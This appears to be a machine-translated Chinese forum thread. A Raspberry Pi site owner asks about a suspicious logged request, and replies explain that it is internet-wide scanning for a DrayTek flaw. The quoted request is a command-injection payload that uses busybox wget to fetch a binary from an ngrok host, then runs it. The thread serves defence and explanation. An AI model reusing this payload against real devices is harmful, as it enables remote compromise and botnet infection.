我打开了一个网站,它的目的只是共享文本信息。后端没有数据库堵塞,或者根本不知道身份验证。然而,当我查看日志时,我注意到了这个请求:
POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
它已经发生了两次,我的服务器都响应了404响应。但现在我有点担心。我的网站运行在一个树莓上,它被塞进了我的ISP设备。即使我的服务器没有任何sudo权限,我想知道他们是否有任何风险?
另外,有人能解释一下这些可疑条目是什么意思吗。风险是什么?最后,你能给我分享一些在任何设备(树莓(和互联网之间设置管道时的技巧/良好行为吗。
无需担心。这是一种攻击,但不是针对您的特定网站,而是扫描互联网的大部分内容以查找特定漏洞。服务器的响应为404,这意味着它不包含易受攻击的页面。
这将发生在任何暴露在公共互联网上的网站上,并被视为背景噪音的一部分。
我在web服务器上也注意到了同样的请求。以下是有关此次攻击的更多信息:https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-draytek-products-could-allow-for-arbitrary-code-execution_2020-043/